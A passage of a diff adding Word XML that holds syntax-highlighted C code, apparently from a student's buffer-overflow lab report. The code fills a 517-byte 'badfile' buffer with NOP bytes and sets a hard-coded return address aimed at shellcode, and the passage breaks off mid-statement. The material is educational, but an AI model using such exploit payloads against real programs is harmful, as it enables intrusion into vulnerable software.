+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>char</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>buffer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>517</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>];</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>FILE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>*</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>/* Initialize buffer with 0x90 (NOP instruction) */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>memset</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>&amp;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>buffer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>0x90</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>517</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>/* You need to fill the buffer with appropriate contents here */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>/* ... Put your code here ... */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>// Part 1: Address of shellcode</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:ind w:firstLine="255"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>long</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>returnAddress</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>0xbffff2c5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:ind w:firstLine="255"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">// or 0xbffff0d8 + 128; // 128 is a value can be decided by myself </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">about </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>from 128 to 240;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>long</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>*</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
